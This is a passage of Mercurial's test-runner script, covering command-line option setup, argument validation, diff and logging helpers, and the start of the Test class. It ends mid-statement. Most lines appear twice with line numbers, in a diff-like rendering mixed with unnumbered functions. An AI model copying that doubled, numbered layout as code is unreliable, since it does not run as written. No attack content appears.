432 harness.add_argument(
433 "-f",
433 "-f",
434 "--first",
434 "--first",
435 action="store_true",
435 action="store_true",
436 help="exit on the first test failure",
436 help="exit on the first test failure",
437 )
437 )
438 harness.add_argument(
438 harness.add_argument(
439 "-i",
439 "-i",
440 "--interactive",
440 "--interactive",
441 action="store_true",
441 action="store_true",
442 help="prompt to accept changed output",
442 help="prompt to accept changed output",
443 )
443 )
444 harness.add_argument(
444 harness.add_argument(
445 "-j",
445 "-j",
446 "--jobs",
446 "--jobs",
447 type=int,
447 type=int,
448 help="number of jobs to run in parallel"
448 help="number of jobs to run in parallel"
449 " (default: $%s or %d)" % defaults['jobs'],
449 " (default: $%s or %d)" % defaults['jobs'],
450 )
450 )
451 harness.add_argument(
451 harness.add_argument(
452 "--keep-tmpdir",
452 "--keep-tmpdir",
453 action="store_true",
453 action="store_true",
454 help="keep temporary directory after running tests",
454 help="keep temporary directory after running tests",
455 )
455 )
456 harness.add_argument(
456 harness.add_argument(
457 '--known-good-rev',
457 '--known-good-rev',
458 metavar="known_good_rev",
458 metavar="known_good_rev",
459 help=(
459 help=(
460 "Automatically bisect any failures using this "
460 "Automatically bisect any failures using this "
461 "revision as a known-good revision."
461 "revision as a known-good revision."
462 ),
462 ),
463 )
463 )
464 harness.add_argument(
464 harness.add_argument(
465 "--list-tests",
465 "--list-tests",
466 action="store_true",
466 action="store_true",
467 help="list tests instead of running them",
467 help="list tests instead of running them",
468 )
468 )
469 harness.add_argument(
469 harness.add_argument(
470 "--loop", action="store_true", help="loop tests repeatedly"
470 "--loop", action="store_true", help="loop tests repeatedly"
471 )
471 )
472 harness.add_argument(
472 harness.add_argument(
473 '--random', action="store_true", help='run tests in random order'
473 '--random', action="store_true", help='run tests in random order'
474 )
474 )
475 harness.add_argument(
475 harness.add_argument(
476 '--order-by-runtime',
476 '--order-by-runtime',
477 action="store_true",
477 action="store_true",
478 help='run slowest tests first, according to .testtimes',
478 help='run slowest tests first, according to .testtimes',
479 )
479 )
480 harness.add_argument(
480 harness.add_argument(
481 "-p",
481 "-p",
482 "--port",
482 "--port",
483 type=int,
483 type=int,
484 help="port on which servers should listen"
484 help="port on which servers should listen"
485 " (default: $%s or %d)" % defaults['port'],
485 " (default: $%s or %d)" % defaults['port'],
486 )
486 )
487 harness.add_argument(
487 harness.add_argument(
488 '--profile-runner',
488 '--profile-runner',
489 action='store_true',
489 action='store_true',
490 help='run statprof on run-tests',
490 help='run statprof on run-tests',
491 )
491 )
492 harness.add_argument(
492 harness.add_argument(
493 "-R", "--restart", action="store_true", help="restart at last error"
493 "-R", "--restart", action="store_true", help="restart at last error"
494 )
494 )
495 harness.add_argument(
495 harness.add_argument(
496 "--runs-per-test",
496 "--runs-per-test",
497 type=int,
497 type=int,
498 dest="runs_per_test",
498 dest="runs_per_test",
499 help="run each test N times (default=1)",
499 help="run each test N times (default=1)",
500 default=1,
500 default=1,
501 )
501 )
502 harness.add_argument(
502 harness.add_argument(
503 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
503 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
504 )
504 )
505 harness.add_argument(
505 harness.add_argument(
506 '--showchannels', action='store_true', help='show scheduling channels'
506 '--showchannels', action='store_true', help='show scheduling channels'
507 )
507 )
508 harness.add_argument(
508 harness.add_argument(
509 "--slowtimeout",
509 "--slowtimeout",
510 type=int,
510 type=int,
511 help="kill errant slow tests after SLOWTIMEOUT seconds"
511 help="kill errant slow tests after SLOWTIMEOUT seconds"
512 " (default: $%s or %d)" % defaults['slowtimeout'],
512 " (default: $%s or %d)" % defaults['slowtimeout'],
513 )
513 )
514 harness.add_argument(
514 harness.add_argument(
515 "-t",
515 "-t",
516 "--timeout",
516 "--timeout",
517 type=int,
517 type=int,
518 help="kill errant tests after TIMEOUT seconds"
518 help="kill errant tests after TIMEOUT seconds"
519 " (default: $%s or %d)" % defaults['timeout'],
519 " (default: $%s or %d)" % defaults['timeout'],
520 )
520 )
521 harness.add_argument(
521 harness.add_argument(
522 "--tmpdir",
522 "--tmpdir",
523 help="run tests in the given temporary directory"
523 help="run tests in the given temporary directory"
524 " (implies --keep-tmpdir)",
524 " (implies --keep-tmpdir)",
525 )
525 )
526 harness.add_argument(
526 harness.add_argument(
527 "-v", "--verbose", action="store_true", help="output verbose messages"
527 "-v", "--verbose", action="store_true", help="output verbose messages"
528 )
528 )
529
529
530 hgconf = parser.add_argument_group('Mercurial Configuration')
530 hgconf = parser.add_argument_group('Mercurial Configuration')
531 hgconf.add_argument(
531 hgconf.add_argument(
532 "--chg",
532 "--chg",
533 action="store_true",
533 action="store_true",
534 help="install and use chg wrapper in place of hg",
534 help="install and use chg wrapper in place of hg",
535 )
535 )
536 hgconf.add_argument(
536 hgconf.add_argument(
537 "--chg-debug", action="store_true", help="show chg debug logs",
537 "--chg-debug", action="store_true", help="show chg debug logs",
538 )
538 )
539 hgconf.add_argument("--compiler", help="compiler to build with")
539 hgconf.add_argument("--compiler", help="compiler to build with")
540 hgconf.add_argument(
540 hgconf.add_argument(
541 '--extra-config-opt',
541 '--extra-config-opt',
542 action="append",
542 action="append",
543 default=[],
543 default=[],
544 help='set the given config opt in the test hgrc',
544 help='set the given config opt in the test hgrc',
545 )
545 )
546 hgconf.add_argument(
546 hgconf.add_argument(
547 "-l",
547 "-l",
548 "--local",
548 "--local",
549 action="store_true",
549 action="store_true",
550 help="shortcut for --with-hg=<testdir>/../hg, "
550 help="shortcut for --with-hg=<testdir>/../hg, "
551 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
551 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
552 )
552 )
553 hgconf.add_argument(
553 hgconf.add_argument(
554 "--ipv6",
554 "--ipv6",
555 action="store_true",
555 action="store_true",
556 help="prefer IPv6 to IPv4 for network related tests",
556 help="prefer IPv6 to IPv4 for network related tests",
557 )
557 )
558 hgconf.add_argument(
558 hgconf.add_argument(
559 "--pure",
559 "--pure",
560 action="store_true",
560 action="store_true",
561 help="use pure Python code instead of C extensions",
561 help="use pure Python code instead of C extensions",
562 )
562 )
563 hgconf.add_argument(
563 hgconf.add_argument(
564 "--rust",
564 "--rust",
565 action="store_true",
565 action="store_true",
566 help="use Rust code alongside C extensions",
566 help="use Rust code alongside C extensions",
567 )
567 )
568 hgconf.add_argument(
568 hgconf.add_argument(
569 "--no-rust",
569 "--no-rust",
570 action="store_true",
570 action="store_true",
571 help="do not use Rust code even if compiled",
571 help="do not use Rust code even if compiled",
572 )
572 )
573 hgconf.add_argument(
573 hgconf.add_argument(
574 "--with-chg",
574 "--with-chg",
575 metavar="CHG",
575 metavar="CHG",
576 help="use specified chg wrapper in place of hg",
576 help="use specified chg wrapper in place of hg",
577 )
577 )
578 hgconf.add_argument(
578 hgconf.add_argument(
579 "--with-hg",
579 "--with-hg",
580 metavar="HG",
580 metavar="HG",
581 help="test using specified hg script rather than a "
581 help="test using specified hg script rather than a "
582 "temporary installation",
582 "temporary installation",
583 )
583 )
584
584
585 reporting = parser.add_argument_group('Results Reporting')
585 reporting = parser.add_argument_group('Results Reporting')
586 reporting.add_argument(
586 reporting.add_argument(
587 "-C",
587 "-C",
588 "--annotate",
588 "--annotate",
589 action="store_true",
589 action="store_true",
590 help="output files annotated with coverage",
590 help="output files annotated with coverage",
591 )
591 )
592 reporting.add_argument(
592 reporting.add_argument(
593 "--color",
593 "--color",
594 choices=["always", "auto", "never"],
594 choices=["always", "auto", "never"],
595 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
595 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
596 help="colorisation: always|auto|never (default: auto)",
596 help="colorisation: always|auto|never (default: auto)",
597 )
597 )
598 reporting.add_argument(
598 reporting.add_argument(
599 "-c",
599 "-c",
600 "--cover",
600 "--cover",
601 action="store_true",
601 action="store_true",
602 help="print a test coverage report",
602 help="print a test coverage report",
603 )
603 )
604 reporting.add_argument(
604 reporting.add_argument(
605 '--exceptions',
605 '--exceptions',
606 action='store_true',
606 action='store_true',
607 help='log all exceptions and generate an exception report',
607 help='log all exceptions and generate an exception report',
608 )
608 )
609 reporting.add_argument(
609 reporting.add_argument(
610 "-H",
610 "-H",
611 "--htmlcov",
611 "--htmlcov",
612 action="store_true",
612 action="store_true",
613 help="create an HTML report of the coverage of the files",
613 help="create an HTML report of the coverage of the files",
614 )
614 )
615 reporting.add_argument(
615 reporting.add_argument(
616 "--json",
616 "--json",
617 action="store_true",
617 action="store_true",
618 help="store test result data in 'report.json' file",
618 help="store test result data in 'report.json' file",
619 )
619 )
620 reporting.add_argument(
620 reporting.add_argument(
621 "--outputdir",
621 "--outputdir",
622 help="directory to write error logs to (default=test directory)",
622 help="directory to write error logs to (default=test directory)",
623 )
623 )
624 reporting.add_argument(
624 reporting.add_argument(
625 "-n", "--nodiff", action="store_true", help="skip showing test changes"
625 "-n", "--nodiff", action="store_true", help="skip showing test changes"
626 )
626 )
627 reporting.add_argument(
627 reporting.add_argument(
628 "-S",
628 "-S",
629 "--noskips",
629 "--noskips",
630 action="store_true",
630 action="store_true",
631 help="don't report skip tests verbosely",
631 help="don't report skip tests verbosely",
632 )
632 )
633 reporting.add_argument(
633 reporting.add_argument(
634 "--time", action="store_true", help="time how long each test takes"
634 "--time", action="store_true", help="time how long each test takes"
635 )
635 )
636 reporting.add_argument("--view", help="external diff viewer")
636 reporting.add_argument("--view", help="external diff viewer")
637 reporting.add_argument(
637 reporting.add_argument(
638 "--xunit", help="record xunit results at specified path"
638 "--xunit", help="record xunit results at specified path"
639 )
639 )
640
640
641 for option, (envvar, default) in defaults.items():
641 for option, (envvar, default) in defaults.items():
642 defaults[option] = type(default)(os.environ.get(envvar, default))
642 defaults[option] = type(default)(os.environ.get(envvar, default))
643 parser.set_defaults(**defaults)
643 parser.set_defaults(**defaults)
644
644
645 return parser
645 return parser
646
646
647
647
def parseargs(args, parser):
    """Parse arguments with our OptionParser and validate results.

    Mutates the module-level ``useipv6`` and ``verbose`` globals as a side
    effect, resolves --local/--with-hg/--with-chg into concrete binary
    paths, and aborts via parser.error() on invalid option combinations.

    Returns the validated options namespace.
    """
    options = parser.parse_args(args)

    # jython is always pure
    if 'java' in sys.platform or '__pypy__' in sys.modules:
        options.pure = True

    # The Rust extensions are CPython-only; reject --rust elsewhere.
    if platform.python_implementation() != 'CPython' and options.rust:
        parser.error('Rust extensions are only available with CPython')

    if options.pure and options.rust:
        parser.error('--rust cannot be used with --pure')

    if options.rust and options.no_rust:
        parser.error('--rust cannot be used with --no-rust')

    if options.local:
        # --local is a shortcut that computes --with-hg (and --with-chg)
        # from the repository checkout containing this script, so mixing
        # it with the explicit options is contradictory.
        if options.with_hg or options.with_chg:
            parser.error('--local cannot be used with --with-hg or --with-chg')
        testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
        reporootdir = os.path.dirname(testdir)
        pathandattrs = [(b'hg', 'with_hg')]
        if options.chg:
            pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
        for relpath, attr in pathandattrs:
            binpath = os.path.join(reporootdir, relpath)
            # the X_OK check is skipped on Windows, where executability
            # is not expressed through mode bits
            if os.name != 'nt' and not os.access(binpath, os.X_OK):
                parser.error(
                    '--local specified, but %r not found or '
                    'not executable' % binpath
                )
            setattr(options, attr, _bytes2sys(binpath))

    if options.with_hg:
        options.with_hg = canonpath(_sys2bytes(options.with_hg))
        if not (
            os.path.isfile(options.with_hg)
            and os.access(options.with_hg, os.X_OK)
        ):
            parser.error('--with-hg must specify an executable hg script')
        # warn (but do not abort) when the file is not named like hg
        if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
            sys.stderr.write('warning: --with-hg should specify an hg script\n')
            sys.stderr.flush()

    if (options.chg or options.with_chg) and os.name == 'nt':
        parser.error('chg does not work on %s' % os.name)
    if options.with_chg:
        options.chg = False  # no installation to temporary location
        options.with_chg = canonpath(_sys2bytes(options.with_chg))
        if not (
            os.path.isfile(options.with_chg)
            and os.access(options.with_chg, os.X_OK)
        ):
            parser.error('--with-chg must specify a chg executable')
    if options.chg and options.with_hg:
        # chg shares installation location with hg
        parser.error(
            '--chg does not work when --with-hg is specified '
            '(use --with-chg instead)'
        )

    if options.color == 'always' and not pygmentspresent:
        sys.stderr.write(
            'warning: --color=always ignored because '
            'pygments is not installed\n'
        )

    if options.bisect_repo and not options.known_good_rev:
        parser.error("--bisect-repo cannot be used without --known-good-rev")

    global useipv6
    if options.ipv6:
        useipv6 = checksocketfamily('AF_INET6')
    else:
        # only use IPv6 if IPv4 is unavailable and IPv6 is available
        useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
            'AF_INET6'
        )

    options.anycoverage = options.cover or options.annotate or options.htmlcov
    if options.anycoverage:
        try:
            import coverage

            covver = version.StrictVersion(coverage.__version__).version
            if covver < (3, 3):
                parser.error('coverage options require coverage 3.3 or later')
        except ImportError:
            parser.error('coverage options now require the coverage package')

    if options.anycoverage and options.local:
        # this needs some path mangling somewhere, I guess
        parser.error(
            "sorry, coverage options do not work when --local " "is specified"
        )

    if options.anycoverage and options.with_hg:
        parser.error(
            "sorry, coverage options do not work when --with-hg " "is specified"
        )

    global verbose
    if options.verbose:
        # an empty string enables verbose logging; log() uses it as the
        # message prefix and vlog() tests it with "is False"
        verbose = ''

    if options.tmpdir:
        options.tmpdir = canonpath(options.tmpdir)

    if options.jobs < 1:
        parser.error('--jobs must be positive')
    if options.interactive and options.debug:
        parser.error("-i/--interactive and -d/--debug are incompatible")
    if options.debug:
        # debug mode streams output directly, so timeouts cannot apply
        if options.timeout != defaults['timeout']:
            sys.stderr.write('warning: --timeout option ignored with --debug\n')
        if options.slowtimeout != defaults['slowtimeout']:
            sys.stderr.write(
                'warning: --slowtimeout option ignored with --debug\n'
            )
        options.timeout = 0
        options.slowtimeout = 0

    if options.blacklist:
        options.blacklist = parselistfiles(options.blacklist, 'blacklist')
    if options.whitelist:
        options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
    else:
        options.whitelisted = {}

    if options.showchannels:
        options.nodiff = True

    return options
782
782
783
783
def rename(src, dst):
    """Move *src* to *dst*, replacing any existing destination.

    Unlike os.rename(), this works even when the destination already
    exists and is open elsewhere: the file is copied into place first
    and the source deleted afterwards, trading away atomicity.
    """
    shutil.copy(src, dst)
    os.unlink(src)
790
790
791
791
def makecleanable(path):
    """Best-effort chmod u+rwx on every directory below *path*.

    Walks the tree top-down so newly readable directories are descended
    into, fixing permissions recursively until the whole tree can be
    deleted.  Errors on individual directories are ignored.
    """
    for root, subdirs, _files in os.walk(path, topdown=True):
        for name in subdirs:
            full = os.path.join(root, name)
            try:
                mode = os.stat(full).st_mode
                os.chmod(full, mode & 0o777 | 0o700)  # chmod u+rwx
            except OSError:
                pass
802
802
803
803
# Diff helper: difflib.unified_diff compares str lines, but the harness
# handles test output as bytes.  On Python 3, wrap it with
# difflib.diff_bytes so byte lines can be diffed directly.
_unified_diff = difflib.unified_diff
if PYTHON3:
    import functools

    _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
809
809
810
810
def getdiff(expected, output, ref, err):
    """Diff *expected* against *output* (sequences of byte lines).

    Returns a (servefail, lines) pair.  *lines* is the unified diff with
    backslashes normalized to '/' in the +++/--- header lines and a
    single trailing padding space stripped before the newline.
    *servefail* is True when the diff contains a "child process failed
    to start" abort line.
    """
    servefail = False
    result = []
    for diffline in _unified_diff(expected, output, ref, err):
        # normalize Windows path separators in the file header lines
        if diffline.startswith((b'+++', b'---')):
            diffline = diffline.replace(b'\\', b'/')
        # drop one trailing padding space before the newline
        if diffline.endswith(b' \n'):
            diffline = diffline[:-2] + b'\n'
        result.append(diffline)
        if not servefail and diffline.startswith(
            b'+ abort: child process failed to start'
        ):
            servefail = True

    return servefail, result
826
826
827
827
# Global verbosity flag: False means quiet; parseargs() rebinds it to ''
# when --verbose is given (log() prints it as a prefix, and vlog() tests
# it with "is False" to decide whether to emit anything).
verbose = False
829
829
830
830
def vlog(*msg):
    """Forward *msg* to log(), but only when verbose mode is active.

    The identity test against False matters: verbose is set to the empty
    string (falsy, but not False) when --verbose is enabled.
    """
    if verbose is not False:
        return log(*msg)
837
837
838
838
# Bytes that break XML even in a CDATA block: control characters 0-31
# sans \t, \n and \r
CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")

# Match feature conditionalized output lines in the form, capturing the feature
# list in group 2, and the preceding line output in group 1:
#
#   output..output (feature !)\n
optline = re.compile(br'(.*) \((.+?) !\)\n$')
848
848
849
849
def cdatasafe(data):
    """Sanitize *data* (bytes) for embedding in an XML CDATA block.

    Control characters that are illegal even inside CDATA are replaced
    with '?', and any ']]>' terminator is split with a space so it
    cannot end the block prematurely.
    """
    sanitized = CDATA_EVIL.sub(b'?', data)
    return sanitized.replace(b']]>', b'] ]>')
859
859
860
860
def log(*msg):
    """Print the given message parts to stdout.

    Parts are printed space-separated on a single line while holding the
    global iolock, and stdout is flushed afterwards.  When verbose mode
    is on, the verbose prefix string is printed first.
    """
    with iolock:
        if verbose:
            print(verbose, end=' ')
        for part in msg:
            print(part, end=' ')
        print()
        sys.stdout.flush()
873
873
874
874
def highlightdiff(line, color):
    """Return *line* (bytes) colorized as diff output via pygments.

    When *color* is falsy the line is returned untouched.  Latin-1 is
    used for the round trip because it maps all 256 byte values.
    """
    if not color:
        return line
    assert pygmentspresent
    text = line.decode('latin1')
    colored = pygments.highlight(text, difflexer, terminal256formatter)
    return colored.encode('latin1')
882
882
883
883
def highlightmsg(msg, color):
    """Return *msg* colorized as a runner status message via pygments.

    When *color* is falsy the message is returned untouched.
    """
    if color:
        assert pygmentspresent
        return pygments.highlight(msg, runnerlexer, runnerformatter)
    return msg
889
889
890
890
def terminate(proc):
    """Terminate subprocess *proc*, tolerating an already-dead process."""
    message = '# Terminating process %d' % proc.pid
    vlog(message)
    try:
        proc.terminate()
    except OSError:
        # the process may already have exited
        pass
898
898
899
899
def killdaemons(pidfile):
    """Kill the daemon processes recorded in *pidfile*.

    Delegates to the killdaemons helper module: best-effort termination
    (tryhard=False), removing the pid file afterwards and routing log
    messages through vlog().
    """
    import killdaemons as _killmod

    return _killmod.killdaemons(
        pidfile, tryhard=False, remove=True, logfn=vlog
    )
904
904
905
905
906 class Test(unittest.TestCase):
906 class Test(unittest.TestCase):
907 """Encapsulates a single, runnable test.
907 """Encapsulates a single, runnable test.
908
908
909 While this class conforms to the unittest.TestCase API, it differs in that
909 While this class conforms to the unittest.TestCase API, it differs in that
910 instances need to be instantiated manually. (Typically, unittest.TestCase
910 instances need to be instantiated manually. (Typically, unittest.TestCase
911 classes are instantiated automatically by scanning modules.)
911 classes are instantiated automatically by scanning modules.)
912 """
912 """
913
913
914 # Status code reserved for skipped tests (used by hghave).
914 # Status code reserved for skipped tests (used by hghave).
915 SKIPPED_STATUS = 80
915 SKIPPED_STATUS = 80
916
916
917 def __init__(
917 def __init__(
918 self,
918 self,
919 path,
919 path,
920 outputdir,
920 outputdir,
921 tmpdir,
921 tmpdir,
922 keeptmpdir=False,
922 keeptmpdir=False,
923 debug=False,
923 debug=False,
924 first=False,
924 first=False,
925 timeout=None,
925 timeout=None,
926 startport=None,
926 startport=None,
927 extraconfigopts=None,
927 extraconfigopts=None,
928 shell=None,
928 shell=None,
929 hgcommand=None,
929 hgcommand=None,
930 slowtimeout=None,
930 slowtimeout=None,
931 usechg=False,
931 usechg=False,
932 chgdebug=False,
932 chgdebug=False,
933 useipv6=False,
933 useipv6=False,
934 ):
934 ):
935 """Create a test from parameters.
935 """Create a test from parameters.
936
936
937 path is the full path to the file defining the test.
937 path is the full path to the file defining the test.
938
938
939 tmpdir is the main temporary directory to use for this test.
939 tmpdir is the main temporary directory to use for this test.
940
940
941 keeptmpdir determines whether to keep the test's temporary directory
941 keeptmpdir determines whether to keep the test's temporary directory
942 after execution. It defaults to removal (False).
942 after execution. It defaults to removal (False).
943
943
944 debug mode will make the test execute verbosely, with unfiltered
944 debug mode will make the test execute verbosely, with unfiltered
945 output.
945 output.
946
946
947 timeout controls the maximum run time of the test. It is ignored when
947 timeout controls the maximum run time of the test. It is ignored when
948 debug is True. See slowtimeout for tests with #require slow.
948 debug is True. See slowtimeout for tests with #require slow.
949
949
950 slowtimeout overrides timeout if the test has #require slow.
950 slowtimeout overrides timeout if the test has #require slow.
951
951
952 startport controls the starting port number to use for this test. Each
952 startport controls the starting port number to use for this test. Each
953 test will reserve 3 port numbers for execution. It is the caller's
953 test will reserve 3 port numbers for execution. It is the caller's
954 responsibility to allocate a non-overlapping port range to Test
954 responsibility to allocate a non-overlapping port range to Test
955 instances.
955 instances.
956
956
957 extraconfigopts is an iterable of extra hgrc config options. Values
957 extraconfigopts is an iterable of extra hgrc config options. Values
958 must have the form "key=value" (something understood by hgrc). Values
958 must have the form "key=value" (something understood by hgrc). Values
959 of the form "foo.key=value" will result in "[foo] key=value".
959 of the form "foo.key=value" will result in "[foo] key=value".
960
960
961 shell is the shell to execute tests in.
961 shell is the shell to execute tests in.
962 """
962 """
963 if timeout is None:
963 if timeout is None:
964 timeout = defaults['timeout']
964 timeout = defaults['timeout']
965 if startport is None:
965 if startport is None:
966 startport = defaults['port']
966 startport = defaults['port']
967 if slowtimeout is None:
967 if slowtimeout is None:
968 slowtimeout = defaults['slowtimeout']
968 slowtimeout = defaults['slowtimeout']
969 self.path = path
969 self.path = path
970 self.bname = os.path.basename(path)
970 self.bname = os.path.basename(path)
971 self.name = _bytes2sys(self.bname)
971 self.name = _bytes2sys(self.bname)
972 self._testdir = os.path.dirname(path)
972 self._testdir = os.path.dirname(path)
973 self._outputdir = outputdir
973 self._outputdir = outputdir
974 self._tmpname = os.path.basename(path)
974 self._tmpname = os.path.basename(path)
975 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
975 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
976
976
977 self._threadtmp = tmpdir
977 self._threadtmp = tmpdir
978 self._keeptmpdir = keeptmpdir
978 self._keeptmpdir = keeptmpdir
979 self._debug = debug
979 self._debug = debug
980 self._first = first
980 self._first = first
981 self._timeout = timeout
981 self._timeout = timeout
982 self._slowtimeout = slowtimeout
982 self._slowtimeout = slowtimeout
983 self._startport = startport
983 self._startport = startport
984 self._extraconfigopts = extraconfigopts or []
984 self._extraconfigopts = extraconfigopts or []
985 self._shell = _sys2bytes(shell)
985 self._shell = _sys2bytes(shell)
986 self._hgcommand = hgcommand or b'hg'
986 self._hgcommand = hgcommand or b'hg'
987 self._usechg = usechg
987 self._usechg = usechg
988 self._chgdebug = chgdebug
988 self._chgdebug = chgdebug
989 self._useipv6 = useipv6
989 self._useipv6 = useipv6
990
990
991 self._aborted = False
991 self._aborted = False
992 self._daemonpids = []
992 self._daemonpids = []
993 self._finished = None
993 self._finished = None
994 self._ret = None
994 self._ret = None
995 self._out = None
995 self._out = None
996 self._skipped = None
996 self._skipped = None
997 self._testtmp = None
997 self._testtmp = None
998 self._chgsockdir = None
998 self._chgsockdir = None
999
999
1000 self._refout = self.readrefout()
1000 self._refout = self.readrefout()
1001
1001
1002 def readrefout(self):
1002 def readrefout(self):
1003 """read reference output"""
1003 """read reference output"""
1004 # If we're not in --debug mode and reference output file exists,
1004 # If we're not in --debug mode and reference output file exists,
1005 # check test output against it.
1005 # check test output against it.
1006 if self._debug:
1006 if self._debug:
1007 return None # to match "out is None"
1007 return None # to match "out is None"
1008 elif os.path.exists(self.refpath):
1008 elif os.path.exists(self.refpath):
1009 with open(self.refpath, 'rb') as f:
1009 with open(self.refpath, 'rb') as f:
1010 return f.read().splitlines(True)
1010 return f.read().splitlines(True)
1011 else:
1011 else:
1012 return []
1012 return []
1013
1013
    # needed to get base class __repr__ running
    # (unittest.TestCase.__repr__ reads self._testMethodName; expose our
    # test name under that attribute so repr() of a Test works.)
    @property
    def _testMethodName(self):
        return self.name
1018
1018
    def __str__(self):
        # Display the test by its file basename (self.name is derived from
        # os.path.basename(path) in __init__).
        return self.name
1021
1021
    def shortDescription(self):
        # One-line description used by unittest's verbose result output;
        # the test file name is the most useful identifier we have.
        return self.name
1024
1024
1025 def setUp(self):
1025 def setUp(self):
1026 """Tasks to perform before run()."""
1026 """Tasks to perform before run()."""
1027 self._finished = False
1027 self._finished = False
1028 self._ret = None
1028 self._ret = None
1029 self._out = None
1029 self._out = None
1030 self._skipped = None
1030 self._skipped = None
1031
1031
1032 try:
1032 try:
1033 os.mkdir(self._threadtmp)
1033 os.mkdir(self._threadtmp)
1034 except OSError as e:
1034 except OSError as e:
1035 if e.errno != errno.EEXIST:
1035 if e.errno != errno.EEXIST:
1036 raise
1036 raise
1037
1037
1038 name = self._tmpname
1038 name = self._tmpname
1039 self._testtmp = os.path.join(self._threadtmp, name)
1039 self._testtmp = os.path.join(self._threadtmp, name)
1040 os.mkdir(self._testtmp)
1040 os.mkdir(self._testtmp)
1041
1041
1042 # Remove any previous output files.
1042 # Remove any previous output files.
1043 if os.path.exists(self.errpath):
1043 if os.path.exists(self.errpath):
1044 try:
1044 try:
1045 os.remove(self.errpath)
1045 os.remove(self.errpath)
1046 except OSError as e:
1046 except OSError as e:
1047 # We might have raced another test to clean up a .err
1047 # We might have raced another test to clean up a .err
1048 # file, so ignore ENOENT when removing a previous .err
1048 # file, so ignore ENOENT when removing a previous .err
1049 # file.
1049 # file.
1050 if e.errno != errno.ENOENT:
1050 if e.errno != errno.ENOENT:
1051 raise
1051 raise
1052
1052
1053 if self._usechg:
1053 if self._usechg:
1054 self._chgsockdir = os.path.join(
1054 self._chgsockdir = os.path.join(
1055 self._threadtmp, b'%s.chgsock' % name
1055 self._threadtmp, b'%s.chgsock' % name
1056 )
1056 )
1057 os.mkdir(self._chgsockdir)
1057 os.mkdir(self._chgsockdir)
1058
1058
    def run(self, result):
        """Run this test and report results against a TestResult instance."""
        # This function is extremely similar to unittest.TestCase.run(). Once
        # we require Python 2.7 (or at least its version of unittest), this
        # function can largely go away.
        self._result = result
        result.startTest(self)
        try:
            try:
                self.setUp()
            except (KeyboardInterrupt, SystemExit):
                self._aborted = True
                raise
            except Exception:
                # setUp failure is an error, not a test failure; skip the
                # test body entirely.
                result.addError(self, sys.exc_info())
                return

            success = False
            try:
                self.runTest()
            except KeyboardInterrupt:
                self._aborted = True
                raise
            except unittest.SkipTest as e:
                result.addSkip(self, str(e))
                # The base class will have already counted this as a
                # test we "ran", but we want to exclude skipped tests
                # from those we count towards those run.
                result.testsRun -= 1
            except self.failureException as e:
                # This differs from unittest in that we don't capture
                # the stack trace. This is for historical reasons and
                # this decision could be revisited in the future,
                # especially for PythonTest instances.
                #
                # addFailure() returning a true value means the user
                # accepted the changed output interactively, so the test
                # counts as a success after all.
                if result.addFailure(self, str(e)):
                    success = True
            except Exception:
                result.addError(self, sys.exc_info())
            else:
                success = True

            # tearDown always runs, and a tearDown error demotes an
            # otherwise successful test.
            try:
                self.tearDown()
            except (KeyboardInterrupt, SystemExit):
                self._aborted = True
                raise
            except Exception:
                result.addError(self, sys.exc_info())
                success = False

            if success:
                result.addSuccess(self)
        finally:
            result.stopTest(self, interrupted=self._aborted)
1113
1113
    def runTest(self):
        """Run this test instance.

        This will return a tuple describing the result of the test.

        Outcomes are reported through self.fail() (AssertionError) or
        unittest.SkipTest; a plain return means the test passed or its
        changed output was accepted interactively.
        """
        env = self._getenv()
        self._genrestoreenv(env)
        self._daemonpids.append(env['DAEMON_PIDS'])
        self._createhgrc(env['HGRCPATH'])

        vlog('# Test', self.name)

        ret, out = self._run(env)
        self._finished = True
        self._ret = ret
        self._out = out

        def describe(ret):
            # Negative return codes conventionally mean "killed by signal".
            if ret < 0:
                return 'killed by signal: %d' % -ret
            return 'returned error code %d' % ret

        self._skipped = False

        if ret == self.SKIPPED_STATUS:
            if out is None:  # Debug mode, nothing to parse.
                missing = ['unknown']
                failed = None
            else:
                missing, failed = TTest.parsehghaveoutput(out)

            if not missing:
                missing = ['skipped']

            if failed:
                # A "hghave" check itself errored out: that is a failure,
                # not a skip.
                self.fail('hg have failed checking for %s' % failed[-1])
            else:
                self._skipped = True
                raise unittest.SkipTest(missing[-1])
        elif ret == 'timeout':
            self.fail('timed out')
        elif ret is False:
            self.fail('no result code from test')
        elif out != self._refout:
            # Diff generation may rely on written .err file.
            if (
                (ret != 0 or out != self._refout)
                and not self._skipped
                and not self._debug
            ):
                with open(self.errpath, 'wb') as f:
                    for line in out:
                        f.write(line)

            # The result object handles diff calculation for us.
            # firstlock serializes interactive prompting across threads.
            with firstlock:
                if self._result.addOutputMismatch(self, ret, out, self._refout):
                    # change was accepted, skip failing
                    return
                if self._first:
                    global firsterror
                    firsterror = True

            if ret:
                msg = 'output changed and ' + describe(ret)
            else:
                msg = 'output changed'

            self.fail(msg)
        elif ret:
            # Output matched but the exit code was non-zero.
            self.fail(describe(ret))
1185
1185
    def tearDown(self):
        """Tasks to perform after run()."""
        # Reap any daemons the test started before touching its files.
        for entry in self._daemonpids:
            killdaemons(entry)
        self._daemonpids = []

        if self._keeptmpdir:
            log(
                '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
                % (_bytes2sys(self._testtmp), _bytes2sys(self._threadtmp),)
            )
        else:
            try:
                shutil.rmtree(self._testtmp)
            except OSError:
                # unreadable directory may be left in $TESTTMP; fix permission
                # and try again
                makecleanable(self._testtmp)
                shutil.rmtree(self._testtmp, True)
            shutil.rmtree(self._threadtmp, True)

        if self._usechg:
            # chgservers will stop automatically after they find the socket
            # files are deleted
            shutil.rmtree(self._chgsockdir, True)

        # Persist the observed output as <test>.err so failures can be
        # diffed (and accepted) after the run. Skipped/debug runs and
        # clean passes write nothing.
        if (
            (self._ret != 0 or self._out != self._refout)
